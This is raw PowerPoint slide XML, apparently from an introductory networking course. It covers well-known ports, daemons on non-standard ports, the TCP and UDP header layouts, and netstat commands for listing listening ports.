            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5236223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82</a:t>
            </a:fld>
            <a:endParaRPr spc="-2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DA16A2D-5177-A835-25B8-304BC29CD201}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="536537" y="1629475"/>
            <a:ext cx="8056880" cy="236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Each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common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protocol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well-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known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35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>0-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1023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range.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Common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processes,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daemons,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well-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known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ports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most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time.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>
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="815975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Ports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are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assigned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by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IANA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and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are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referenced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in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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>document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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>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680938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A18F7AB-D587-D2BC-07ED-B79EC145C500}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="455130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B6EC6CF-D27D-1E59-0BF0-0B5BD9DD70D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="542556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100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Well-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>known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Ports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4A1A228-A993-E95D-560B-218F5B84F7A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5241633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0F8F142-C0A8-3088-354E-D5E9D4F71F96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5241633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83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3C80C4D-D4E3-4D43-ED77-BD20D18BBFAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="541947" y="1137604"/>
            <a:ext cx="76377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do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need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know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all</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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service</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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2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assignments,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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but</a:t>
            </a:r>
            <a:endParaRPr sz="2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2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should</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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at</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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least</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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remember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2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most</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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252525"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>common,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>such</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="22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Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>as:</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="table">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51D5019C-91F0-481F-EB73-474A61A7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97" y="1894917"/>
            <a:ext cx="7664448" cy="27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120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BFF6355-EE1A-0714-7DCA-00C0822F6700}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="44118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366F8C4-8C1D-06B1-4CBC-928D919D5115}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="52861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100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Well-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>known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Ports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BD0E43C-37FB-0560-885D-612331CA77FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522768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06C2D02-AB53-99C6-270F-1BD4BC294158}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522768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84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1D7C6C4-B6A3-EDFE-F056-6B8BA74396C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="528002" y="1264019"/>
            <a:ext cx="808799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briefly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introduced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before,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daemon</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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program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that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runs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service.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System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administrators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change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daemon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configuration,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changing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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b="1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b="1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service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listens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connection.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They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do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make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services recognition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little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bit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harder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hackers.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For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example,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could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find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FTP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daemon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listening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endParaRPr sz="2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4982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instead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21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SSH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listening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8821.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259713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B0456CB-F5A8-5B77-5FEE-CC2FF3B763D1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839D36A-F23E-E886-4396-41CBBD8D3122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TCP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UDP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headers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1A0272D-4A00-AC89-6831-11AFF1E8C825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284C1E2-7F2D-F9F6-E592-8E7971F4E3A9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85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2AA31DB-E21B-98B1-02AB-B8E4E3DA9482}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1813041"/>
            <a:ext cx="791019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Let’s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now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ports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used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by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applications.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client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applications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know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which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to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use?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They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two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fields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TCP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UDP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header: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source</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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destination</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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ports.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6311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18140ED-95D6-0A78-48F9-96A171F471C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1668335" y="1109588"/>
            <a:ext cx="642683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80564" algn="l"/>
                <a:tab pos="3949065" algn="l"/>
                <a:tab pos="5918200" algn="l"/>
              </a:tabLst>
            </a:pP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0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1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2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3</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="111125">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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0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1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2 3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4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5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6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7 8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9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0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1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2 3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4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5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6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7 8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9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0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1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2 3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4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5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6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7 8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9</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="13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0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+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1096010" algn="l"/>
                <a:tab pos="3164205" algn="l"/>
                <a:tab pos="3950970" algn="l"/>
                <a:tab pos="6315075" algn="l"/>
              </a:tabLst>
            </a:pP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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Source</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1300" b="1" spc="-4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b="1" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Port</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1300" b="1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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Destination</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1300" b="1" spc="-7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b="1" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Port</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1300" b="1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B873CFF-A5BC-1579-5EB3-DAD8AE51AD9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1681035" y="1942080"/>
            <a:ext cx="1774189" cy="78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>
              <a:lnSpc>
                <a:spcPts val="1340"/>
              </a:lnSpc>
            </a:pP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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1300" spc="-25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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1300" spc="-25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AA48B31-166A-C2B1-9AD9-71F516C9B159}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3441001" y="1901763"/>
            <a:ext cx="465455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+</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New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  <a:tabLst>
                <a:tab pos="3839210" algn="l"/>
              </a:tabLst>
            </a:pP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Sequence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Number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</a:pP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+</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="7620" algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="4232275" algn="l"/>
              </a:tabLst>
            </a:pP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Acknowledgment</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1300" spc="-9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Number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2362F05-221E-3C0F-792C-D4E9A61A1058}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1668335" y="2694801"/>
            <a:ext cx="64268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+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6B4937F-8361-91C3-2EBC-946521AFEDD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6097505" y="3091295"/>
            <a:ext cx="6165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Window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D63E951-C972-869A-65DF-47B80D51706F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1668335" y="2892617"/>
            <a:ext cx="179895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7975" algn="l"/>
              </a:tabLst>
            </a:pP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Data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 |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r>
              <a:rPr sz="1300" spc="-2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Offset|</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1300" spc="-3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Reserved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800100" algn="l"/>
              </a:tabLst>
            </a:pP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DBA77510-33C7-7AB2-FCC4-0E04B652BB5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3636855" y="2892617"/>
            <a:ext cx="130746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|U|A|P|R|S|F|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|R|C|S|S|Y|I|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|G|K|H|T|N|N|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3DF455E6-5F6C-EC4C-A928-596CF6D58180}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7968258" y="2892617"/>
            <a:ext cx="12573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76E7034B-2680-B846-5A64-0F1544C062A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1668335" y="3487536"/>
            <a:ext cx="64268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+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CD07A7A3-6DFF-D7C2-F083-768C0A8B2F6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1668335" y="3685655"/>
            <a:ext cx="327532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94435" algn="l"/>
                <a:tab pos="3162935" algn="l"/>
              </a:tabLst>
            </a:pP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Checksum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BA94F3AF-C44E-F8EA-05FB-CD9FDF304131}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5803380" y="3685655"/>
            <a:ext cx="22891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77415" algn="l"/>
              </a:tabLst>
            </a:pP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Urgent</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1300" spc="-4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Pointer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08FDC485-44F9-C245-ECD0-23F0AC215531}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1668335" y="3883826"/>
            <a:ext cx="64268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+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0C91865-E047-A40B-890B-165235E0B5BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1668335" y="4081642"/>
            <a:ext cx="48501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80260" algn="l"/>
                <a:tab pos="4737735" algn="l"/>
              </a:tabLst>
            </a:pP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Options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149D1DAC-5BB2-1D00-A983-3860F2CB48CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6886164" y="4081642"/>
            <a:ext cx="12077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6010" algn="l"/>
              </a:tabLst>
            </a:pP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Padding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C07611AE-6884-B127-5D25-C132DE0731E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1668335" y="4280371"/>
            <a:ext cx="642683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+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2964815" algn="l"/>
                <a:tab pos="6312535" algn="l"/>
              </a:tabLst>
            </a:pP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20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>data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+-+-+-+-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="130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300" spc="-50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>+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D5D4CC13-615F-0D80-EAB0-193671E42055}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="738364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TCP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Header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55BCCDAC-B777-3E5C-EF75-060A5B359B68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="327088" y="2020178"/>
            <a:ext cx="3200400" cy="788035"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3200400" h="788035">
                <a:moveTo>
                  <a:pt x="3200400" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="787907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3200400" y="787907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3200400" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="3E3E3E">
              <a:alpha val="74900"/>
            </a:srgbClr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47A992AC-68F1-23A8-A743-3A5F82BEE14D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="391502" y="2069708"/>
            <a:ext cx="286004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source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destination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included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protocol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header.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TCP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header...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C02EA690-AA4B-3FC2-6431-C36DCB925688}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5437441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2C0EC89B-9092-5FC9-CD1A-48E942D2E76A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5437441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86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4255306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1CB3757-421B-080F-30B1-84B625C20C89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532726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UDP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Header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36A2569-EDF8-D4FF-7544-EC2250314D3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5231803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D233E9C-A56A-47F5-6E2E-43682593A548}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5231803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87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FB471AD-E264-F461-D008-21D14BA37D93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="910069" y="1865466"/>
            <a:ext cx="6943090" cy="2330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2141855" algn="l"/>
                <a:tab pos="4269105" algn="l"/>
                <a:tab pos="6396990" algn="l"/>
              </a:tabLst>
            </a:pP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0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1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2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3</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="118745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0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1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2</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="14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3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4</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="14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5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6</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="14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7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8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9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0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1</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="14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2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3</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="14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4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5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6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7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8</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="14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9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0</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="14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1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2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3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4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5</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="14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6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7</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-1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8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9</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-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0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1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+-+-+-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+-+-+-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+-+-+-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+-+-+-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+-+-+-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+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1183005" algn="l"/>
                <a:tab pos="3416935" algn="l"/>
                <a:tab pos="4267835" algn="l"/>
                <a:tab pos="6821170" algn="l"/>
              </a:tabLst>
            </a:pP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400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Source</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-4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b="1" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Port</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1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400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Destination</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-8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1400" b="1" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Port</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1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+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-</a:t>
            </a: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+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1501775" algn="l"/>
                <a:tab pos="3418204" algn="l"/>
                <a:tab pos="4693920" algn="l"/>
                <a:tab pos="6822440" algn="l"/>
              </a:tabLst>
            </a:pP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Length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Checksum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+-+-+-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+-+-+-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+-+-+-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+-+-+-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+-+-</a:t>
            </a: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+-+-+-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+-</a:t>
            </a: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+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3204845" algn="l"/>
                <a:tab pos="6822440" algn="l"/>
              </a:tabLst>
            </a:pP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400" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>	</a:t>
            </a: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|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solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:endParaRPr sz="14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540605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A197E53-A5C8-F87B-2301-3C693166B9C5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E32880E-EDB4-888A-0F65-74F08D52254C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8 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-1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Command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AA23F1C-556D-1D04-B32A-1248CF27D945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990D8A4-7F7E-1DE0-6BBC-BA45C543DBBD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88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B101FC6-350D-8AE6-2181-5ECBD08DBD80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1139051"/>
            <a:ext cx="7143750" cy="34645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defPPr>
              <a:defRPr kern="0"/>
            </a:defPPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="12700" marR="38481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check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listening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ports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current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(TCP) connections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host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use:</a:t>
            </a:r>
            <a:endParaRPr sz="240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1038225" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-4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ourier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ano</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-4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0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Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1038225" indent="-4572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038225" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-4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ourier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>tunp</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-4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0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Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Linux</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1038225" indent="-457200">
              <a:lnSpc>
                <a:spcPts val="2280"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="240"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1038225" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-3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ourier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
